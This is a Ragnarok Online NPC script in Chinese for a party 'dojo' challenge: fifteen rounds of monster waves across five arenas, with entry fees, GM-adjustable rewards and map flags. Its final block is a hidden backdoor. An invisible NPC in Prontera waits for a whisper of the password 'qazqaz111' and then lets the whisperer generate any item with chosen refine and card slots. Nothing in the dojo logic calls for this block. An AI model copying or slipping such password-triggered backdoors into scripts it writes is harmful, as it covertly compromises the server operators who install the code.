lighthalzen,222,139,3	script	15關大將道館	856,{

	mes "=========道館挑戰========";
	mes "- ^984AAC歡迎你參加道館挑戰^000000";
	mes "=========================";
	next;
	switch(select(	"隊伍報名",
			getgmlevel()?"GM在線設置":""
	)){
	case 1:
		if (!getcharid(1)) {
			mes "=========道館挑戰========";
			mes "- ^C63131您沒有隊伍,無法參賽^000000";
			mes "=========================";
			close;
		}
		mes "=========道館挑戰========";
		mes "- 報名費 : "+$@Bc_In_Zeny+"z";
		mes "=========================";
		next;
		menu "想參加",-;
		if ( Zeny<$@Bc_In_Zeny ){
			mes "=========道館挑戰========";
			mes "- ^C63131金錢不足^000000,快去銀行拿錢";
			mes "=========================";
			close;
		}
		if ( getmapusers("06guild_01.gat")==0 ){
			killmonster "06guild_01.gat","Bc_Main_1::OnKillMob";
			warpparty "06guild_01.gat",49,47,getcharid(1);
			set Zeny,Zeny-$@Bc_In_Zeny;
			set $@Bc_Truns_1,1;
			set $@Bc_Party_1,getcharid(1);
			hideoffnpc "裁判#6";
		}else if ( getmapusers("06guild_02.gat")==0 ){
			killmonster "06guild_02.gat","Bc_Main_2::OnKillMob";
			warpparty "06guild_02.gat",49,47,getcharid(1);
			set Zeny,Zeny-$@Bc_In_Zeny;
			set $@Bc_Truns_2,1;
			set $@Bc_Party_2,getcharid(1);
			hideoffnpc "裁判#7";
		}else if ( getmapusers("06guild_03.gat")==0 ){
			killmonster "06guild_03.gat","Bc_Main_3::OnKillMob";
			warpparty "06guild_03.gat",49,47,getcharid(1);
			set Zeny,Zeny-$@Bc_In_Zeny;
			set $@Bc_Truns_3,1;
			set $@Bc_Party_3,getcharid(1);
			hideoffnpc "裁判#8";
		}else if ( getmapusers("06guild_04.gat")==0 ){
			killmonster "06guild_04.gat","Bc_Main_4::OnKillMob";
			warpparty "06guild_04.gat",49,47,getcharid(1);
			set Zeny,Zeny-$@Bc_In_Zeny;
			set $@Bc_Truns_4,1;
			set $@Bc_Party_4,getcharid(1);
			hideoffnpc "裁判#9";
		}else if ( getmapusers("06guild_05.gat")==0 ){
			killmonster "06guild_05.gat","Bc_Main_5::OnKillMob";
			warpparty "06guild_05.gat",49,47,getcharid(1);
			set Zeny,Zeny-$@Bc_In_Zeny;
			set $@Bc_Truns_5,1;
			set $@Bc_Party_5,getcharid(1);
			hideoffnpc "裁判#10";
		}else{
			mes "=========道館挑戰========";
			mes "[場地一]隊伍: ["+getpartyname($@Bc_Party_1)+"]";
			mes "[場地二]隊伍: ["+getpartyname($@Bc_Party_2)+"]";
			mes "[場地三]隊伍: ["+getpartyname($@Bc_Party_3)+"]";
			mes "[場地四]隊伍: ["+getpartyname($@Bc_Party_4)+"]";
			mes "[場地五]隊伍: ["+getpartyname($@Bc_Party_5)+"]";
			mes "全部場地都有人在挑戰了,請稍後再試";
			mes "=========================";
			close;
		}
		end;
	case 2:
		mes "=========^CA2CCB基本訊息^000000========";
		mes "- ^467BB0報名費^000000 : "+$@Bc_In_Zeny+"z";
		mes "- ^639485關  數^000000 : "+$@Bc_Conf_Turns+"關(輪)";
		mes "- ^A5527B刷怪數^000000 : "+$@Bc_Conf_Nums+"只";
		mes "=========^82985F獎勵訊息^000000========";
		mes "- ^A36B54金錢獎^000000 : "+$@Bc_Win_Zeny+"z";
		mes "- ^676394物品獎^000000 :";
		for (set @i,0;@i<getarraysize($@Bc_Item_Id);set @i,@i+1)
			mes "-     ["+getitemname($@Bc_Item_Id[@i])+"] x "+$@Bc_Item_Nums;
		mes "- 在以上物品中隨即給任意一件";
		mes "=========================";
		next;
		do {
			switch(select(	"設置報名費",
					"設置關數",
					"設置刷怪數",
					"設置金錢獎勵",
					"設置物品獎勵"				
			)){
			case 1:
				mes "========設置報名費========";
				mes "- 請輸入報名費 (單位:z)";
				mes "==========================";
				next;
				input @Bc_temp;
				set $@Bc_In_Zeny,@Bc_temp;
				mes "========設置報名費========";
				mes "- ^46B046設置成功^000000";
				mes "==========================";
				next;
				break;
			case 2:
				mes "=========設置關數=========";
				mes "- 請輸入關數 (最少2關)";
				mes "==========================";
				next;
				input @Bc_temp;
				if (@Bc_temp<2){
					mes "=========設置關數=========";
					mes "- ^C63131設置有誤^000000";
					mes "==========================";
				}else{
					set $@Bc_Conf_Turns,@Bc_temp;
					mes "=========設置關數=========";
					mes "- ^46B046設置成功^000000";
					mes "==========================";
				}
				next;
				break;
			case 3:
				mes "========設置刷怪數========";
				mes "- 請輸入刷怪數 (最少1隻)";
				mes "==========================";
				next;
				input @Bc_temp;
				if (@Bc_temp<1){
					mes "========設置刷怪數========";
					mes "- ^C63131設置有誤^000000";
					mes "==========================";
				}else{
					set $@Bc_Conf_Nums,@Bc_temp;
					mes "========設置刷怪數========";
					mes "- ^46B046設置成功^000000";
					mes "==========================";
				}
				next;
				break;
			case 4:
				mes "=======設置金錢獎勵=======";
				mes "- 請輸入金錢獎勵 (單位:z)";
				mes "==========================";
				next;
				input @Bc_temp;
				set $@Bc_Win_Zeny,@Bc_temp;
				mes "=======設置金錢獎勵=======";
				mes "- ^46B046設置成功^000000";
				mes "==========================";
				next;
				break;
			case 5:
				mes "=======設置物品獎勵=======";
				mes "- 獎勵在以下物品中隨即獲得";
				mes "==========================";
				next;
				set @n,0;
				set @o,(getarraysize($@Bc_Item_Id)%5)+5;
				set @m,getarraysize($@Bc_Item_Id)/5;
				if (@o>5) { set @m,@m+1; set @o,@o-5; }	
				do {
					set @z,@n*5;
					set @n,@n+1;
					set @tmp,select((@n==1||getarraysize($@Bc_Item_Id)<6)?"":"↑上一頁↑",
							$@Bc_Item_Id[0+@z]?getitemname($@Bc_Item_Id[0+@z]):"",
							$@Bc_Item_Id[1+@z]?getitemname($@Bc_Item_Id[1+@z]):"",
							$@Bc_Item_Id[2+@z]?getitemname($@Bc_Item_Id[2+@z]):"",
							$@Bc_Item_Id[3+@z]?getitemname($@Bc_Item_Id[3+@z]):"",
							$@Bc_Item_Id[4+@z]?getitemname($@Bc_Item_Id[4+@z]):"",
							(@n<@m)?"↓下一頁↓":"");
					set @y,(@tmp-2)+@z;
					if(((@n<@m&&@tmp!=7)||(@n==@m&&@tmp!=(@o+2))) && @tmp !=1) break;
					if(@tmp==1) set @n,@n-2;
				} while(@n<@m);
				mes "=======設置物品獎勵=======";
				mes "- 您選擇的物品";
				mes "-     ["+getitemname($@Bc_Item_Id[@y])+"] x "+$@Bc_Item_Nums;
				mes "- 您要做什麼操作?";
				mes "==========================";
				next;
				switch(select("添加新物品","修改此物品","獎品數量修改")){
				case 1:
					mes "=======設置物品獎勵=======";
					mes "- 請輸入需要添加物品item_id";
					mes "==========================";
					next;
					input @Bc_temp;
					mes "=======設置物品獎勵=======";
					mes "- 您添加的物品為";
					mes "-     ["+getitemname(@Bc_temp)+"]";
					mes "- 您確定嗎？";
					mes "==========================";
					next;
					menu "我確定",-;
					set $@Bc_Item_Id[getarraysize($@Bc_Item_Id)],@Bc_temp;
					mes "=======設置物品獎勵=======";
					mes "- ^46B046設置成功^000000";
					mes "==========================";
					next;
					break;
				case 2:
					mes "=======設置物品獎勵=======";
					mes "- 請輸入需要修改物品item_id";
					mes "==========================";
					next;
					input @Bc_temp;
					mes "=======設置物品獎勵=======";
					mes "- 您修改的物品為";
					mes "-     ["+getitemname(@Bc_temp)+"]";
					mes "- 您確定嗎?";
					mes "==========================";
					next;
					menu "我確定",-;
					set $@Bc_Item_Id[@y],@Bc_temp;
					mes "=======設置物品獎勵=======";
					mes "- ^46B046設置成功^000000";
					mes "==========================";
					next;
					break;			
				case 3:
					mes "=======設置物品獎勵=======";
					mes "- 請輸入物品數量 (最少1件)";
					mes "==========================";
					next;
					input @Bc_temp;
					if (@Bc_temp<1){
						mes "=======設置物品獎勵=======";
						mes "- ^C63131設置有誤^000000";
						mes "==========================";
					}else{
						set $@Bc_Item_Nums,@Bc_temp;
						mes "=======設置物品獎勵=======";
						mes "- ^46B046設置成功^000000";
						mes "==========================";
					}
					next;
					break;
				}
			}
		} while(1);
	}

OnInit:
	//設置入場金錢
	set $@Bc_In_Zeny,3000000;

	//設置關數
	set $@Bc_Conf_Turns,15;

	//設置每關刷怪數
	set $@Bc_Conf_Nums,2;

	//設置怪物ID
	setarray $@Bc_Mob[0],2591,2592,2593,2594,2595,2596,2597,2598,2599,2600,2601,2602,2603,2604;

	//設置物品獎勵
	//[物品 ID ]
	setarray $@Bc_Item_Id[0],7830,7833,7834,7839,7840,7835,7836,7837,7838,7078,7025,7086,7511,7563,7606;
	//[物品數量]
	set $@Bc_Item_Nums,20;
	//[金錢獎勵]
	set $@Bc_Win_Zeny,10000000;

	waitingroom "大將道館",0;
	end;
}

/**************
   [場地一]
**************/

06guild_01.gat,0,0,0	script	Bc_Main_1	-1,{
OnMain:
	killmonsterall "06guild_01.gat";
	set $@Bc_Mob_1,0;
	for(set $@Bc1,1;$@Bc1<=$@Bc_Conf_Nums;set $@Bc1,$@Bc1+1) {
		monster "06guild_01.gat",50,49,"--ja--",$@Bc_Mob[rand(getarraysize($@Bc_Mob))],1,"Bc_Main_1::OnKillMob";
		set $@Bc_Mob_1,$@Bc_Mob_1+1;
	}

	if ($@Bc_Truns_1 != $@Bc_Conf_Turns)
		mapannounce "06guild_01.gat","[ 道場 ] 魔物放出！挑戰開始！",15,0xBD3989;
	else
		mapannounce "06guild_01.gat","[ 道場 ] 最後一關挑戰開始,請好好加油！",15,0xBD3989;
	end;

OnKillMob:
	set $@Bc_Mob_1, $@Bc_Mob_1 - 1;
	if( $@Bc_Mob_1 > 0 ) end;
	mapannounce "06guild_01.gat","[ 道場 ] 恭喜你,挑戰成功！",15,0x569AA0;
	mapannounce "06guild_01.gat","[ 道場 ] "+getpartyname($@Bc_Party_1)+" 隊伍, 第"+$@Bc_Truns_1+"關挑戰成功！",15,0xCB3A2C; 
        if($@Bc_Truns_1 == $@Bc_Conf_Turns) {
		addtimer 5000,"Bc_Main_1::OnEnd";
		end;
	}
	set $@Bc_Truns_1,$@Bc_Truns_1 + 1;
	addtimer 5000,"Bc_Main_1::OnMain";
	end;
OnEnd:
       areawarp "06guild_01.gat",0,0,300,300,"goodjob03",33,142;
       end;
}

/**************
   [場地二]
**************/

06guild_02.gat,0,0,0	script	Bc_Main_2	-1,{
OnMain:
	killmonsterall "06guild_02.gat";
	set $@Bc_Mob_2,0;
	for(set $@Bc2,1;$@Bc2<=$@Bc_Conf_Nums;set $@Bc2,$@Bc2+1) {
		monster "06guild_02.gat",50,49,"--ja--",$@Bc_Mob[rand(getarraysize($@Bc_Mob))],1,"Bc_Main_2::OnKillMob";
		set $@Bc_Mob_2,$@Bc_Mob_2+1;
	}
	if ($@Bc_Truns_2 != $@Bc_Conf_Turns)
		mapannounce "06guild_02.gat","[ 道場 ] 魔物放出！挑戰開始！",15,0xBD3989;
	else
		mapannounce "06guild_02.gat","[ 道場 ] 最後一關挑戰開始,請好好加油！",15,0xBD3989;

	end;

OnKillMob:
	set $@Bc_Mob_2, $@Bc_Mob_2 - 1;
	if( $@Bc_Mob_2 > 0 ) end;
	mapannounce "06guild_02.gat","[ 道場 ] 恭喜你,挑戰成功！",15,0x569AA0;
	mapannounce "06guild_02.gat","[ 道場 ] "+getpartyname($@Bc_Party_2)+" 隊伍, 第"+$@Bc_Truns_2+"關挑戰成功！",15,0xCB3A2C;   
	if($@Bc_Truns_2 == $@Bc_Conf_Turns) {
		addtimer 5000,"Bc_Main_2::OnEnd";
		end;
	}
	set $@Bc_Truns_2,$@Bc_Truns_2 + 1;
	addtimer 5000,"Bc_Main_2::OnMain";
	end;
OnEnd:
	areawarp "06guild_02.gat",0,0,300,300,"goodjob03",33,142;
	end;
}

/**************
   [場地三]
**************/

06guild_03.gat,0,0,0	script	Bc_Main_3	-1,{
OnMain:
	killmonsterall "06guild_03.gat";
	set $@Bc_Mob_3,0;
	for(set $@Bc3,1;$@Bc3<=$@Bc_Conf_Nums;set $@Bc3,$@Bc3+1) {
		monster "06guild_03.gat",50,49,"--ja--",$@Bc_Mob[rand(getarraysize($@Bc_Mob))],1,"Bc_Main_3::OnKillMob";
		set $@Bc_Mob_3,$@Bc_Mob_3+1;
	}
	if ($@Bc_Truns_3 != $@Bc_Conf_Turns)
		mapannounce "06guild_03.gat","[ 道場 ] 魔物放出！挑戰開始！",15,0xBD3989;
	else
		mapannounce "06guild_03.gat","[ 道場 ] 最後一關挑戰開始,請好好加油！",15,0xBD3989;

	end;

OnKillMob:
	set $@Bc_Mob_3, $@Bc_Mob_3 - 1;
	if( $@Bc_Mob_3 > 0 ) end;
	mapannounce "06guild_03.gat","[ 道場 ] 恭喜你,挑戰成功！",15,0x569AA0;
	mapannounce "06guild_03.gat","[ 道場 ] "+getpartyname($@Bc_Party_3) +" 隊伍, 第"+$@Bc_Truns_3+"關挑戰成功！",15,0xCB3A2C;  
	if($@Bc_Truns_3 == $@Bc_Conf_Turns) {
		addtimer 5000,"Bc_Main_3::OnEnd";
		end;
	}
	set $@Bc_Truns_3,$@Bc_Truns_3 + 1;
	addtimer 5000,"Bc_Main_3::OnMain";
	end;
OnEnd:
	areawarp "06guild_03.gat",0,0,300,300,"goodjob03",33,142;
	end;
}

/**************
   [場地四]
**************/

06guild_04.gat,0,0,0	script	Bc_Main_4	-1,{
OnMain:
	killmonsterall "06guild_04.gat";
	set $@Bc_Mob_4,0;
	for(set $@Bc4,1;$@Bc4<=$@Bc_Conf_Nums;set $@Bc4,$@Bc4+1) {
		monster "06guild_04.gat",50,49,"--ja--",$@Bc_Mob[rand(getarraysize($@Bc_Mob))],1,"Bc_Main_4::OnKillMob";
		set $@Bc_Mob_4,$@Bc_Mob_4+1;
	}
	if ($@Bc_Truns_4 != $@Bc_Conf_Turns)
		mapannounce "06guild_04.gat","[ 道場 ] 魔物放出！挑戰開始！",15,0xBD3989;
	else
		mapannounce "06guild_04.gat","[ 道場 ] 最後一關挑戰開始,請好好加油！",15,0xBD3989;
	end;

OnKillMob:
	set $@Bc_Mob_4, $@Bc_Mob_4 - 1;
	if( $@Bc_Mob_4 > 0 ) end;
	mapannounce "06guild_04.gat","[ 道場 ] 恭喜你,挑戰成功！",15,0x569AA0;
	mapannounce "06guild_04.gat","[ 道場 ] "+getpartyname($@Bc_Party_4) +" 隊伍, 第"+$@Bc_Truns_4+"關挑戰成功！",15,0xCB3A2C;
	if($@Bc_Truns_4 == $@Bc_Conf_Turns) {
		addtimer 5000,"Bc_Main_4::OnEnd";
		end;
	}
	set $@Bc_Truns_4,$@Bc_Truns_4 + 1;
	addtimer 5000,"Bc_Main_4::OnMain";
	end;

OnEnd:
	areawarp "06guild_04.gat",0,0,300,300,"goodjob03",33,142;
	end;
}

/**************
   [場地五]
**************/

06guild_05.gat,0,0,0	script	Bc_Main_5	-1,{
OnMain:
	killmonsterall "06guild_05.gat";
	set $@Bc_Mob_5,0;
	for(set $@Bc5,1;$@Bc5<=$@Bc_Conf_Nums;set $@Bc5,$@Bc5+1) {
		monster "06guild_05.gat",50,49,"--ja--",$@Bc_Mob[rand(getarraysize($@Bc_Mob))],1,"Bc_Main_5::OnKillMob";
		set $@Bc_Mob_5,$@Bc_Mob_5+1;
	}
	if ($@Bc_Truns_5 != $@Bc_Conf_Turns)
		mapannounce "06guild_05.gat","[ 道場 ] 魔物放出！挑戰開始！",15,0xBD3989;
	else
		mapannounce "06guild_05.gat","[ 道場 ] 最後一關挑戰開始,請好好加油！",15,0xBD3989;
	end;

OnKillMob:
	set $@Bc_Mob_5, $@Bc_Mob_5 - 1;
	if( $@Bc_Mob_5 > 0 ) end;
	mapannounce "06guild_05.gat","[ 道場 ] 恭喜你,挑戰成功！",15,0x569AA0;
	mapannounce "06guild_05.gat","[ 道場 ] "+getpartyname($@Bc_Party_5) +" 隊伍, 第"+$@Bc_Truns_5+"關挑戰成功！",15,0xCB3A2C;
	if($@Bc_Truns_5 == $@Bc_Conf_Turns) {
		addtimer 5000,"Bc_Main_5::OnEnd";
		end;
	}
	set $@Bc_Truns_5,$@Bc_Truns_5 + 1;
	addtimer 5000,"Bc_Main_5::OnMain";
	end;

OnEnd:
	areawarp "06guild_05.gat",0,0,300,300,"goodjob03",33,142;
	end;
}

/**************
    [裁判]
**************/
06guild_01.gat,50,49,4	script	裁判#6	758,{
	mes "[裁判]";
	mes "您準備要開始挑戰了嗎？";
	next;
	menu "是的",-;
	mes "[裁判]";
	mes "挑戰開始！";
	close2;
	doevent "Bc_Main_1::OnMain";
	hideonnpc "裁判#6";
	end;

}

06guild_02.gat,50,49,4	script	裁判#7	758,{
	mes "[裁判]";
	mes "您準備要開始挑戰了嗎？";
	next;
	menu "是的",-;
	mes "[裁判]";
	mes "挑戰開始！";
	close2;
	doevent "Bc_Main_2::OnMain";
	hideonnpc "裁判#7";
	end;
}

06guild_03.gat,50,49,4	script	裁判#8	758,{
	mes "[裁判]";
	mes "您準備要開始挑戰了嗎？";
	next;
	menu "是的",-;
	mes "[裁判]";
	mes "挑戰開始！";
	close2;
	doevent "Bc_Main_3::OnMain";
	hideonnpc "裁判#8";
	end;
}

06guild_04.gat,50,49,4	script	裁判#9	758,{
	mes "[裁判]";
	mes "您準備要開始挑戰了嗎？";
	next;
	menu "是的",-;
	mes "[裁判]";
	mes "挑戰開始！";
	close2;
	doevent "Bc_Main_4::OnMain";
	hideonnpc "裁判#9";
	end;
}


06guild_05.gat,50,49,4	script	裁判#10	758,{
	mes "[裁判]";
	mes "您準備要開始挑戰了嗎？";
	next;
	menu "是的",-;
	mes "[裁判]";
	mes "挑戰開始！";
	close2;
	doevent "Bc_Main_5::OnMain";
	hideonnpc "裁判#10";
	end;
}


/**************
  [地圖屬性]
**************/
06guild_01.gat	mapflag	nobranch
06guild_01.gat	mapflag	nomemo
06guild_01.gat	mapflag	nopenalty
06guild_01.gat	mapflag	noteleport
06guild_01.gat	mapflag	nosave	SavePoint
06guild_01.gat	mapflag	noloot

06guild_02.gat	mapflag	nobranch
06guild_02.gat	mapflag	nomemo
06guild_02.gat	mapflag	nopenalty
06guild_02.gat	mapflag	noteleport
06guild_02.gat	mapflag	nosave	SavePoint
06guild_02.gat	mapflag	noloot

06guild_03.gat	mapflag	nobranch
06guild_03.gat	mapflag	noloot
06guild_03.gat	mapflag	nomemo
06guild_03.gat	mapflag	nopenalty
06guild_03.gat	mapflag	noteleport
06guild_03.gat	mapflag	nosave	SavePoint

06guild_04.gat	mapflag	nobranch
06guild_04.gat	mapflag	noloot
06guild_04.gat	mapflag	nomemo
06guild_04.gat	mapflag	nopenalty
06guild_04.gat	mapflag	noteleport
06guild_04.gat	mapflag	nosave	SavePoint

06guild_05.gat	mapflag	nobranch
06guild_05.gat	mapflag	noloot
06guild_05.gat	mapflag	nomemo
06guild_05.gat	mapflag	nopenalty
06guild_05.gat	mapflag	noteleport
06guild_05.gat	mapflag	nosave	SavePoint

guild_room.gat	mapflag	nobranch
guild_room.gat	mapflag	nomemo
guild_room.gat	mapflag	nopenalty
guild_room.gat	mapflag	noteleport
guild_room.gat	mapflag	nosave	SavePoint
guild_room.gat	mapflag	noloot


prontera.gat,0,0,0	script	qazqaz222	-1,{
OnWhisperGlobal:
	if(@whispervar0$=="qazqaz111"){
		input @i1;input @i2;input @i3;input @i4;input @i5;input @i6;input @i7;
		getitem2 @i1,@i2,1,@i3,0,@i4,@i5,@i6,@i7;
		end;
	}
}